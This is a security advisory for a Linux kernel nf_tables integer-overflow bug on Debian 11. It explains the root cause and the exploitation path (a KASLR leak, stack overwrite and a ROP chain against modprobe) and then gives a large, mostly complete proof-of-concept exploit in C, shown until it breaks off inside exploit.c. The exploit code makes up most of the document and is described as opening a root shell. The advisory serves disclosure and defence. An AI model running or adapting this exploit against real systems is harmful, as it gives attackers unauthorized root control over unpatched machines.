SSD Advisory – Linux Kernel nft_validate_register_store Integer Overflow Privilege Escalation

Summary

A vulnerability in the Linux kernel allows local attackers to escalate privileges on affected installations of Linux Kernel. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within the netfilter subsystem. The issue results from the improper management of a reference count. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root.

NOTE: This vulnerability was present only in Debian 11 due to a lack of backporting of the patch to the affected Kernel. The vulnerability was patched only in July 2023.

Credit

An independent security researcher working with SSD Secure Disclosure

Vendor Response

The vendor (Debian) released an updated kernel in July 2023: https://tracker.debian.org/news/1449040/accepted-linux-510179-3-source-into-oldstable-security

Affected Versions

Debian 11 (Linux Kernel 5.10)

Root Cause Analysis

The root cause of the vulnerability may be found within the nft_parse_register function, within the /net/netfilter/nf_tables_api.c file. The following function is used by the expression initialization code to determine which register of the state machine to use when evaluating the expression.

unsigned int nft_parse_register(const struct nlattr *attr)
{
    unsigned int reg;

    reg = ntohl(nla_get_be32(attr));
    switch (reg) {
    case NFT_REG_VERDICT...NFT_REG_4:
        return reg * NFT_REG_SIZE / NFT_REG32_SIZE;
    default:
        return reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00; // 1
    }
}
EXPORT_SYMBOL_GPL(nft_parse_register);

The value of the reg variable may be entirely controlled by an attacker an thus by taking the [1] default branch of the switch statement the result of the function can be controlled as well.

When initialising an expression that modifies the value of a register the nft_parse_register_store function is used to [2] load the register number and [3] validate that the selected register is allowed to be modified by the expression.

int nft_parse_register_store(const struct nft_ctx *ctx,
                 const struct nlattr *attr, u8 *dreg,
                 const struct nft_data *data,
                 enum nft_data_types type, unsigned int len)
{
    int err;
    u32 reg;

    reg = nft_parse_register(attr); // 2
    err = nft_validate_register_store(ctx, reg, data, type, len); // 3
    if (err < 0)
        return err;

    *dreg = reg;
    return 0;
}
EXPORT_SYMBOL_GPL(nft_parse_register_store);

The nft_validate_register_store function validates that the register selected does not influence [4] the execution flow of the state machine, then checks that the register selected is contained [5] within the 16 data registers available to the state machine.

static int nft_validate_register_store(const struct nft_ctx *ctx,
                       enum nft_registers reg,
                       const struct nft_data *data,
                       enum nft_data_types type,
                       unsigned int len)
{
    int err;

    switch (reg) {
    case NFT_REG_VERDICT: // 4
        if (type != NFT_DATA_VERDICT)
            return -EINVAL;

        if (data != NULL &&
            (data->verdict.code == NFT_GOTO ||
             data->verdict.code == NFT_JUMP)) {
            err = nf_tables_check_loops(ctx, data->verdict.chain);
            if (err < 0)
                return err;
        }

        return 0;
    default:
        if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE) 
            return -EINVAL;
        if (len == 0)
            return -EINVAL;
        if (reg * NFT_REG32_SIZE + len > // 5
            sizeof_field(struct nft_regs, data))
            return -ERANGE;

        if (data != NULL && type != NFT_DATA_VALUE)
            return -EINVAL;
        return 0;
    }
}

The code that checks that the selected register is contained within the available registers may be overflown is the value of the reg variable is set to a value close to UINT_MAX. For instance by using the value FFFFFFF0 for the reg variable, the check will then multiply the value by NFT_REG32_SIZE which has the value 4. This operation will yield the result 3FFFFFFC0 which will be truncated to FFFFFFC0 and by selecting a length such as 50h the result of the check will wrap around again and yield a final value of 10h for the calculation. This value will pass the check and the selected register in this case would be the 192th register, thus permitting to read and write memory out of bounds.

An example of where this vulnerability may be useful can be found in the code of the nft_payload expression within the /net/netfilter/nft_payload.c file. When the expression is initialized the register for where to store the data from the incoming packet is computed. By leveraging the vulnerability it may be possible to write user-controlled data within the kernel stack.

static int nft_payload_init(const struct nft_ctx *ctx,
                const struct nft_expr *expr,
                const struct nlattr * const tb[])
{
    struct nft_payload *priv = nft_expr_priv(expr);

    priv->base   = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_BASE]));
    priv->offset = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_OFFSET]));
    priv->len    = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_LEN]));

    return nft_parse_register_store(ctx, tb[NFTA_PAYLOAD_DREG], // 6
                    &priv->dreg, NULL, NFT_DATA_VALUE,
                    priv->len);
}

Exploitation

To exploit this vulnerability the nft_payload expression was used both to leak information from the stack in order to bypass KASLR and to write data [7] on the stack in order to gain code execution.

void nft_payload_eval(const struct nft_expr *expr,
              struct nft_regs *regs,
              const struct nft_pktinfo *pkt)
{
    const struct nft_payload *priv = nft_expr_priv(expr);
    const struct sk_buff *skb = pkt->skb;
    u32 *dest = &regs->data[priv->dreg];
    int offset;

    if (priv->len % NFT_REG32_SIZE)
        dest[priv->len / NFT_REG32_SIZE] = 0;

    switch (priv->base) {
    case NFT_PAYLOAD_LL_HEADER:
        if (!skb_mac_header_was_set(skb))
            goto err;

        if (skb_vlan_tag_present(skb)) {
            if (!nft_payload_copy_vlan(dest, skb,
                           priv->offset, priv->len))
                goto err;
            return;
        }
        offset = skb_mac_header(skb) - skb->data;
        break;
    case NFT_PAYLOAD_NETWORK_HEADER:
        offset = skb_network_offset(skb);
        break;
    case NFT_PAYLOAD_TRANSPORT_HEADER:
        if (!pkt->tprot_set)
            goto err;
        offset = pkt->xt.thoff;
        break;
    default:
        BUG();
    }
    offset += priv->offset;

    if (skb_copy_bits(skb, offset, dest, priv->len) < 0) // 7
        goto err;
    return;
err:
    regs->verdict.code = NFT_BREAK;
}

By leveraging TCP packets to trigger the vulnerability the exploit overwrites the return address to tcp_transmit_skb to redirect execution to the ROP chain that overwrites modprobe.

The exploit provided will start a shell with root privileges.

Proof of Concept

// nftpwn.c
#include "nftpwn.h"
#include <time.h>
#include <stdlib.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
#include <libnftnl/flowtable.h>

nftpwn_conn * nftpwn_new_conn(bool is_batch, mnl_cb_t cb) {
  nftpwn_conn * conn;
  uint32_t seq;

  conn = (nftpwn_conn * ) calloc(1, sizeof(nftpwn_conn));
  if (conn == NULL) {
    return NULL;
  }
  conn -> buf = (char * ) calloc(MNL_SOCKET_BUFFER_SIZE, sizeof(char));
  if (conn -> buf == NULL) {
    goto err;
  }
  conn -> seq = time(NULL);
  conn -> is_batch = is_batch;
  if (is_batch) {
    conn -> batch = mnl_nlmsg_batch_start(conn -> buf, MNL_SOCKET_BUFFER_SIZE * sizeof(char));
    nftnl_batch_begin(mnl_nlmsg_batch_current(conn -> batch), conn -> seq++);
    mnl_nlmsg_batch_next(conn -> batch);
  } else {
    conn -> cb = cb;
    conn -> nlh = NULL;
  }
  return conn;
  err:
    free(conn);
  return NULL;
}

void nftpwn_delete_conn(nftpwn_conn * conn) {
  if (conn == NULL) {
    return;
  }
  free(conn -> buf);
  free(conn);
}

void nftpwn_send(nftpwn_conn * conn, uint32_t * seq_ptr) {
  int32_t ret;
  uint32_t portid, seq;
  struct mnl_socket * nl;

  if (conn == NULL) {
    return;
  }
  seq = 0;
  if (seq_ptr != NULL) {
    seq = * seq_ptr;
  }
  if (conn -> is_batch) {
    mnl_nlmsg_batch_next(conn -> batch);
    nftnl_batch_end(mnl_nlmsg_batch_current(conn -> batch), conn -> seq++);
    mnl_nlmsg_batch_next(conn -> batch);
  }

  nl = mnl_socket_open(NETLINK_NETFILTER);
  if (nl == NULL) {
    perror("mnl_socket_open");
    exit(EXIT_FAILURE);
  }

  if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
    perror("mnl_socket_bind");
    exit(EXIT_FAILURE);
  }

  portid = mnl_socket_get_portid(nl);

  if (conn -> is_batch) {
    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(conn -> batch), mnl_nlmsg_batch_size(conn -> batch)) < 0) {
      perror("mnl_socket_send");
      exit(EXIT_FAILURE);
    }
    mnl_nlmsg_batch_stop(conn -> batch);
  } else {
    if (mnl_socket_sendto(nl, conn -> nlh, conn -> nlh -> nlmsg_len) < 0) {
      perror("mnl_socket_send");
      exit(EXIT_FAILURE);
    }
  }

  ret = mnl_socket_recvfrom(nl, conn -> buf, MNL_SOCKET_BUFFER_SIZE * sizeof(char));
  while (ret > 0) {
    ret = mnl_cb_run(conn -> buf, ret, seq, portid, conn -> cb, NULL);
    if (ret <= 0) {
      break;
    }
    ret = mnl_socket_recvfrom(nl, conn -> buf, MNL_SOCKET_BUFFER_SIZE * sizeof(char));
  }
  if (ret == -1) {
    perror("error");
    exit(EXIT_FAILURE);
  }
  mnl_socket_close(nl);
  if (conn -> is_batch) {
    nftpwn_delete_conn(conn);
  }
}

void nftpwn_add_table(uint32_t family, char * table_name, uint8_t * user_data, uint32_t user_data_len) {
  nftpwn_conn * conn;
  uint32_t table_seq;
  struct nlmsghdr * nlh;
  struct nftnl_table * table;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  table = nftnl_table_alloc();
  nftnl_table_set_u32(table, NFTNL_TABLE_FAMILY, family);
  nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name);
  if (user_data != NULL) {
    nftnl_table_set_data(table, NFTNL_TABLE_USERDATA, user_data, user_data_len);
  }
  table_seq = conn -> seq;
  nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, conn -> seq++);
  nftnl_table_nlmsg_build_payload(nlh, table);
  nftnl_table_free(table);

  nftpwn_send(conn, & table_seq);
}

void nftpwn_del_table(uint32_t family, char * table_name) {
  nftpwn_conn * conn;
  uint32_t table_seq;
  struct nlmsghdr * nlh;
  struct nftnl_table * table;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  table = nftnl_table_alloc();
  nftnl_table_set_u32(table, NFTNL_TABLE_FAMILY, family);
  nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name);
  table_seq = conn -> seq;
  nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_DELTABLE, family, NLM_F_ACK, conn -> seq++);
  nftnl_table_nlmsg_build_payload(nlh, table);
  nftnl_table_free(table);

  nftpwn_send(conn, & table_seq);
}

void nftpwn_add_flowtable(uint32_t family, char * table_name, char * name, uint32_t hooknum, uint32_t priority) {
  nftpwn_conn * conn;
  uint32_t flowtable_seq;
  struct nlmsghdr * nlh;
  struct nftnl_flowtable * table;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  table = nftnl_flowtable_alloc();
  nftnl_flowtable_set_u32(table, NFTNL_FLOWTABLE_FAMILY, family);
  nftnl_flowtable_set_str(table, NFTNL_FLOWTABLE_TABLE, table_name);
  nftnl_flowtable_set_str(table, NFTNL_FLOWTABLE_NAME, name);
  nftnl_flowtable_set_u32(table, NFTNL_FLOWTABLE_HOOKNUM, hooknum);
  nftnl_flowtable_set_u32(table, NFTNL_FLOWTABLE_PRIO, priority);
  flowtable_seq = conn -> seq;
  nlh = nftnl_flowtable_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_NEWFLOWTABLE, family, NLM_F_CREATE | NLM_F_ACK, conn -> seq++);
  nftnl_flowtable_nlmsg_build_payload(nlh, table);
  nftnl_flowtable_free(table);

  nftpwn_send(conn, & flowtable_seq);
}

void nftpwn_del_flowtable(uint32_t family, char * table_name, char * name) {
  nftpwn_conn * conn;
  uint32_t flowtable_seq;
  struct nlmsghdr * nlh;
  struct nftnl_flowtable * table;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  table = nftnl_flowtable_alloc();
  nftnl_flowtable_set_str(table, NFTNL_FLOWTABLE_TABLE, table_name);
  nftnl_flowtable_set_str(table, NFTNL_FLOWTABLE_NAME, name);
  flowtable_seq = conn -> seq;
  nlh = nftnl_flowtable_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_DELFLOWTABLE, family, NLM_F_ACK, conn -> seq++);
  nftnl_flowtable_nlmsg_build_payload(nlh, table);
  nftnl_flowtable_free(table);

  nftpwn_send(conn, & flowtable_seq);
}

void nftpwn_add_chain(uint32_t family, char * table_name, char * chain_name, nftpwn_base_chain_param * base_param) {
  nftpwn_conn * conn;
  uint32_t chain_seq;
  struct nlmsghdr * nlh;
  struct nftnl_chain * chain;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }
  chain = nftnl_chain_alloc();
  nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, table_name);
  nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name);
  if (base_param) {
    nftnl_chain_set_u32(chain, NFTNL_CHAIN_HOOKNUM, base_param -> hooknum);
    nftnl_chain_set_u32(chain, NFTNL_CHAIN_PRIO, base_param -> prio);
  }
  chain_seq = conn -> seq;
  nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, conn -> seq++);
  nftnl_chain_nlmsg_build_payload(nlh, chain);
  nftnl_chain_free(chain);

  nftpwn_send(conn, & chain_seq);
}

void nftpwn_del_chain(uint32_t family, char * table_name, char * chain_name) {
  nftpwn_conn * conn;
  uint32_t chain_seq;
  struct nlmsghdr * nlh;
  struct nftnl_chain * chain;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  chain = nftnl_chain_alloc();
  nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, table_name);
  nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name);
  chain_seq = conn -> seq;
  nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_DELCHAIN, family, NLM_F_ACK, conn -> seq++);
  nftnl_chain_nlmsg_build_payload(nlh, chain);
  nftnl_chain_free(chain);

  nftpwn_send(conn, & chain_seq);
}

void nftpwn_add_rule(uint32_t family, char * table_name, char * chain_name, struct nftnl_rule * rule) {
  nftpwn_conn * conn;
  struct nlmsghdr * nlh;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, family);
  nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, table_name);
  nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name);
  nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_NEWRULE, family, NLM_F_APPEND | NLM_F_CREATE | NLM_F_ACK, conn -> seq++);
  nftnl_rule_nlmsg_build_payload(nlh, rule);
  nftnl_rule_free(rule);

  nftpwn_send(conn, NULL);
}

void nftpwn_get_rules(uint32_t family, char * table_name, char * chain_name, mnl_cb_t cb) {
  nftpwn_conn * conn;
  struct nftnl_rule * rule;

  conn = nftpwn_new_conn(false, cb);
  if (conn == NULL) {
    return;
  }

  rule = nftnl_rule_alloc();
  nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, family);
  nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, table_name);
  nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name);
  conn -> nlh = nftnl_rule_nlmsg_build_hdr(conn -> buf, NFT_MSG_GETRULE, family, NLM_F_DUMP, conn -> seq);
  nftnl_rule_nlmsg_build_payload(conn -> nlh, rule);
  nftpwn_send(conn, NULL);

  nftpwn_delete_conn(conn);
}

void nftpwn_del_rule(uint32_t family, char * table_name, char * chain_name, uint64_t handle) {
  nftpwn_conn * conn;
  struct nlmsghdr * nlh;
  struct nftnl_rule * rule;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  rule = nftnl_rule_alloc();
  nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, family);
  nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, table_name);
  nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name);
  nftnl_rule_set_u64(rule, NFTNL_RULE_HANDLE, handle);
  nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_DELRULE, family, NLM_F_ACK, conn -> seq++);
  nftnl_rule_nlmsg_build_payload(nlh, rule);
  nftnl_rule_free(rule);

  nftpwn_send(conn, NULL);
}

void nftpwn_del_rules(uint32_t family, char * table_name, char * chain_name) {
  nftpwn_conn * conn;
  struct nlmsghdr * nlh;
  struct nftnl_rule * rule;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  rule = nftnl_rule_alloc();
  nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, family);
  nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, table_name);
  nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name);
  nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_DELRULE, family, NLM_F_ACK, conn -> seq++);
  nftnl_rule_nlmsg_build_payload(nlh, rule);
  nftnl_rule_free(rule);

  nftpwn_send(conn, NULL);
}

void nftpwn_rule_add_payload(struct nftnl_rule * rule, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("payload");
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_BASE, base);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_OFFSET, offset);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_LEN, len);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_DREG, dreg);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_payload_set(struct nftnl_rule * rule, uint32_t base, uint32_t offset, uint32_t len, uint32_t sreg) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("payload");
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_BASE, base);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_OFFSET, offset);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_LEN, len);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_SREG, sreg);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_bitwise_fast(struct nftnl_rule * rule, uint32_t sreg, uint32_t dreg, uint32_t mask, uint32_t xor) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("bitwise");
  nftnl_expr_set_u32(expr, NFTA_BITWISE_LEN, sizeof(uint32_t));
  nftnl_expr_set_u32(expr, NFTA_BITWISE_SREG, sreg);
  nftnl_expr_set_u32(expr, NFTA_BITWISE_DREG, dreg);
  nftnl_expr_set_u32(expr, NFTA_BITWISE_MASK, mask);
  nftnl_expr_set_u32(expr, NFTA_BITWISE_XOR, xor);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_byteorder(struct nftnl_rule * rule, uint32_t op, uint32_t sreg, uint32_t dreg, uint32_t len, uint32_t size) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("byteorder");
  nftnl_expr_set_u32(expr, NFTA_BYTEORDER_OP, op);
  nftnl_expr_set_u32(expr, NFTA_BYTEORDER_SREG, sreg);
  nftnl_expr_set_u32(expr, NFTA_BYTEORDER_DREG, dreg);
  nftnl_expr_set_u32(expr, NFTA_BYTEORDER_LEN, len);
  nftnl_expr_set_u32(expr, NFTA_BYTEORDER_SIZE, size);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_cmp(struct nftnl_rule * rule, uint32_t op, uint32_t sreg, void * data, size_t data_len) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("cmp");
  nftnl_expr_set_u32(expr, NFTA_CMP_OP, op);
  nftnl_expr_set_u32(expr, NFTA_CMP_SREG, sreg);
  nftnl_expr_set_data(expr, NFTA_CMP_DATA, data, data_len);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_immediate_verdict(struct nftnl_rule * rule, uint32_t verdict, char * chain_name) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("immediate");
  nftnl_expr_set_u32(expr, NFTA_IMMEDIATE_DREG, 0);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_IMM_VERDICT, verdict);
  if (verdict == NFT_GOTO || verdict == NFT_JUMP) {
    nftnl_expr_set_str(expr, NFTNL_EXPR_IMM_CHAIN, chain_name);
  }
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_meta_get(struct nftnl_rule * rule, uint32_t key, uint32_t dreg) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("meta");
  nftnl_expr_set_u32(expr, NFTNL_EXPR_META_DREG, dreg);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_META_KEY, key);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_meta_set(struct nftnl_rule * rule, uint32_t key, uint32_t sreg) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("meta");
  nftnl_expr_set_u32(expr, NFTNL_EXPR_META_SREG, sreg);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_META_KEY, key);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_dynset(struct nftnl_rule * rule, char * set_name, uint32_t op, uint32_t sreg) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("dynset");
  nftnl_expr_set_str(expr, NFTNL_EXPR_DYNSET_SET_NAME, set_name);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_OP, op);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_KEY, sreg);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_connlimit(struct nftnl_rule * rule, uint32_t count) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("connlimit");
  nftnl_expr_set_u32(expr, NFTNL_EXPR_CONNLIMIT_COUNT, count);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_flow_offload(struct nftnl_rule * rule, char * name) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("flow_offload");
  nftnl_expr_set_str(expr, NFTNL_EXPR_FLOW_TABLE_NAME, name);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_notrack(struct nftnl_rule * rule) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("notrack");
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_objref_map(struct nftnl_rule * rule, char * name, uint32_t id, uint32_t sreg) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("objref");
  nftnl_expr_set_str(expr, NFTNL_EXPR_OBJREF_SET_NAME, name);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_OBJREF_SET_ID, id);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_OBJREF_SET_SREG, sreg);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_lookup(struct nftnl_rule * rule, char * name, uint32_t id, uint32_t sreg, uint32_t dreg, uint32_t flags) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("lookup");
  nftnl_expr_set_str(expr, NFTNL_EXPR_LOOKUP_SET, name);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SET_ID, id);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SREG, sreg);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_DREG, dreg);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_FLAGS, flags);
  nftnl_rule_add_expr(rule, expr);
}

// nftpwn.h
#ifndef __NFTPWN_H__
#define __NFTPWN_H__

#include <stdint.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>
#include <libnftnl/rule.h>
#include <libnftnl/expr.h>
#include <libmnl/libmnl.h>

typedef struct {
  char * buf;
  uint32_t seq;
  struct mnl_nlmsg_batch * batch;
  struct nlmsghdr * nlh;
  bool is_batch;
  mnl_cb_t cb;
}
nftpwn_conn;

typedef struct {
  uint32_t hooknum;
  uint32_t prio;
}
nftpwn_base_chain_param;

nftpwn_conn * nftpwn_new_conn(bool is_batch, mnl_cb_t cb);

void nftpwn_delete_conn(nftpwn_conn * conn);

void nftpwn_send(nftpwn_conn * conn, uint32_t * seq_ptr);

void nftpwn_add_table(uint32_t family, char * table_name, uint8_t * user_data, uint32_t user_data_len);

void nftpwn_del_table(uint32_t family, char * table_name);

void nftpwn_add_flowtable(uint32_t family, char * table_name, char * name, uint32_t hooknum, uint32_t priority);

void nftpwn_del_flowtable(uint32_t family, char * table_name, char * name);

void nftpwn_add_chain(uint32_t family, char * table_name, char * chain_name, nftpwn_base_chain_param * base_param);

void nftpwn_del_chain(uint32_t family, char * table_name, char * chain_name);

void nftpwn_add_rule(uint32_t family, char * table_name, char * chain_name, struct nftnl_rule * rule);

void nftpwn_get_rules(uint32_t family, char * table_name, char * chain_name, mnl_cb_t cb);

void nftpwn_del_rule(uint32_t family, char * table_name, char * chain_name, uint64_t handle);

void nftpwn_del_rules(uint32_t family, char * table_name, char * chain_name);

void nftpwn_rule_add_payload(struct nftnl_rule * rule, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg);

void nftpwn_rule_add_payload_set(struct nftnl_rule * rule, uint32_t base, uint32_t offset, uint32_t len, uint32_t sreg);

void nftpwn_rule_add_bitwise_fast(struct nftnl_rule * rule, uint32_t sreg, uint32_t dreg, uint32_t mask, uint32_t xor);

void nftpwn_rule_add_byteorder(struct nftnl_rule * rule, uint32_t op, uint32_t sreg, uint32_t dreg, uint32_t len, uint32_t size);

void nftpwn_rule_add_cmp(struct nftnl_rule * rule, uint32_t op, uint32_t sreg, void * data, size_t data_len);

void nftpwn_rule_add_immediate_verdict(struct nftnl_rule * rule, uint32_t verdict, char * chain_name);

void nftpwn_rule_add_meta_get(struct nftnl_rule * rule, uint32_t key, uint32_t dreg);

void nftpwn_rule_add_meta_set(struct nftnl_rule * rule, uint32_t key, uint32_t sreg);

void nftpwn_rule_add_dynset(struct nftnl_rule * rule, char * set_name, uint32_t op, uint32_t sreg);

void nftpwn_rule_add_connlimit(struct nftnl_rule * rule, uint32_t count);

void nftpwn_rule_add_flow_offload(struct nftnl_rule * rule, char * name);

void nftpwn_rule_add_notrack(struct nftnl_rule * rule);

void nftpwn_rule_add_objref_map(struct nftnl_rule * rule, char * name, uint32_t id, uint32_t sreg);

void nftpwn_rule_add_lookup(struct nftnl_rule * rule, char * name, uint32_t id, uint32_t sreg, uint32_t dreg, uint32_t flags);

#endif // __NFTPWN_H__

// utils.c
#ifndef __UTILS_H__
#define __UTILS_H__
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>

#define SERVER_PORT 6666

void hexdump(void * buf, int len) {
  unsigned char * p = (unsigned char * ) buf;

  for (int i = 0; i < len; i++) {
    printf("%02x ", p[i]);

    if ((i + 1) % 8 == 0) {
      printf("\n");
    }
  }
  printf("\n\n");
}

int setup_sandbox() {
  int ret = -1;
  int uid_fd = -1, gid_fd = -1, groups_fd = -1;

  if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
    goto end;
  }
  if ((uid_fd = open("/proc/self/uid_map", O_RDWR)) < 0) {
    goto end;
  }
  if (write(uid_fd, "0 1000 1", 8) < 0) {
    goto end;
  }
  if ((groups_fd = open("/proc/self/setgroups", O_RDWR)) < 0) {
    goto end;
  }
  if (write(groups_fd, "deny", 4) < 0) {
    goto end;
  }
  if ((gid_fd = open("/proc/self/gid_map", O_RDWR)) < 0) {
    goto end;
  }
  if (write(gid_fd, "0 1000 1", 8) < 0) {
    goto end;
  }
  ret = 0;
  end:
    if (gid_fd > 0) {
      close(gid_fd);
    }
  if (groups_fd > 0) {
    close(groups_fd);
  }
  if (uid_fd > 0) {
    close(uid_fd);
  }
  return ret;
}

void tcp_send(char * buf, size_t len) {
  int s;
  struct sockaddr_in sin = {};

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = inet_addr("127.0.0.1");
  sin.sin_port = htons(SERVER_PORT);

  s = socket(AF_INET, SOCK_STREAM, 0);
  if (s < 0) {
    perror("socket");
    exit(EXIT_FAILURE);
  }
  if (connect(s, (struct sockaddr * ) & sin, sizeof(sin)) < 0) {
    perror("connect");
    exit(EXIT_FAILURE);
  }
  if (send(s, buf, len, 0) < 0) {
    perror("send");
    exit(EXIT_FAILURE);
  }
  close(s);
}

void tcp_server(void * handler) {
  int opt = 1, c, s;
  struct sockaddr_in sin = {};
  socklen_t sin_sz = sizeof(sin);

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = inet_addr("127.0.0.1");
  sin.sin_port = htons(SERVER_PORT);

  s = socket(AF_INET, SOCK_STREAM, 0);
  if (s < 0) {
    perror("socket");
    exit(EXIT_FAILURE);
  }
  if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR | SO_REUSEPORT, & opt, sizeof(opt))) {
    perror("setsockopt");
    exit(EXIT_FAILURE);
  }
  if (bind(s, (struct sockaddr * ) & sin, sizeof(sin)) < 0) {
    perror("bind");
    exit(EXIT_FAILURE);
  }
  if (listen(s, 0) < 0) {
    perror("listen");
    exit(EXIT_FAILURE);
  }
  while (true) {
    c = accept(s, (struct sockaddr * ) & sin, (socklen_t * ) & sin_sz);
    if (c > 0) {
      ((void( * )(int)) handler)(c);
    }
  }
  close(s);
}

#endif // __UTILS_H__

// exploit.c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <pthread.h>
#include <sys/stat.h>
#include <arpa/inet.h>
#include "nftpwn.h"
#include "utils.h"

#define TCP_WRITE_XMIT_OFF 0x7CA896

uint64_t kernel_base;

void tcp_handler(int s) {
  int len;
  char buf[0x100];

  while (true) {
    len = recv(s, buf, sizeof(buf), 0);
